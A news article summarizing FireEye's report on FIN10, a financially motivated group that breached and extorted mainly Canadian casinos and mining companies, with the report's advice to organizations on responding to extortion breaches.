FireEye, Inc. has observed an actor carrying out financially motivated intrusion operations – targeting organizations in North America, but predominately in Canada – that may require a different type of response, the company suggests in a new report.
Believed to be carried out by a previously unobserved actor or group FireEye calls FIN10, the intrusion operations – mostly casinos and mining organizations in North America, with a focus on Canada – date back to at least 2013, continued through 2016 and were still active as recently as early June, the California-based the intelligence-led security firm reported Friday.
Said intrusions involved attacker(s) compromising organizations’ networks and seeking “to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations,” FIN10: Anatomy of a Cyber Extortion Operation reports.
Pointing out that FIN10 primarily relies on publicly available software, scripts and techniques to gain a foothold into victims’ networks, proof of stolen data is then posted on publicly accessible websites and a ransom made.
In all but one targeted intrusion attributed to FIN10, a sum payable in Bitcooin was demanded. Requested sums ranged from 100 to 500 Bitcoins (roughly $124,000 to $620,000 as of mid-April 2017.
“Failure to pay the threat group could result in the public release of stolen data and potential disruption or destruction of the victim’s information assets and systems,” the report notes.
Although there is insufficient evidence to determine the initial infection vector, it points out, in at least two intrusions, FIN10 leveraged spear phishing emails with malicious attachments, “making it plausible that this methodology was used across all breaches.”
FIN10 used Meterpreter – short for Meta-Interpreter, an advanced payload included in the Metasploit Framework – as the primary method of establishing an initial foothold within victim environments. “Meterpreter and most of its extensions are executed in memory, thus largely evading detection by standard anti-virus.”
In addition, “in the majority of cases, we observed FIN10 leveraging PowerShell Empire (a pen-testing tool that utilizes PowerShell) for elevated persistence, mainly by utilizing the Registry and Scheduled Task options,” it explains. “We have regularly observed FIN10 use scheduled tasks as a persistence mechanism.”
Network degradation activity “typically consisted of the attacker(s) creating scheduled tasks on multiple systems within the targeted network environment to disrupt the normal operations of those systems by rendering their operating systems unusable.”
Once contact was made, “FIN10 also seeks to increase its leverage by sending multiple emails to staff and board members of the victim organizations, notifying them of the breach and potential consequences for non-payment,” the report points out.
“We believe the primary goal of FIN10 is to steal corporate business data, files, records, correspondents and customer PII (personally identifiable information) for the purposes of extorting victim organizations for the non-release of the stolen data.”
“In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems,” states the report.
“The relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion-based campaigns at least in the near term,” FireEye reports. “Notably, we already have some evidence to suggest FIN10 has targeted additional victims beyond currently confirmed targets,” the report adds.
Unlike breaches where a containment plan may be able to stop an attacker from stealing more information, it states, “in these disruptive instances, the damage may have already been done by the time the attacker(s) contacts the victim organization.”
Lessons learned from investigating FIN10 and other disruptive breaches suggest affected organizations do the following:
confirm that there is a breach – examine the environment for evidence of compromise before considering to pay the ransom;
remember that the company is dealing with a human adversary – carefully consider how an attacker will react to action or inaction;
timing is critical – validate and scope the breach as quickly as is possible;
stay focused – evaluate if the tasks being taken on will help to mitigate, detect, respond to or contain the attack;
carefully evaluate whether to engage with the attacker(s) – attackers do not always expect a response;
engage the experts before a breach – identify partners before the breach and get them on retainer;
consider all options when asked to pay a ransom – there is no guarantee the attacker(s) will not come back for more money or simply leak the data anyway;
ensure strong segmentation and controls over back-ups – tighten access to the back-up environment to mitigate the risk of an attacker accessing the system using compromised credentials and destroying back-ups;
immediately focus on broader security improvements once the incident has been handled – ensure the full extent of the breach is understood and implement both tactical and strategic actions to prevent future attackers from gaining access; and
know that attackers may come back in a different way – operationalize and enhance the temporary solutions that were deployed to immediately address the attack.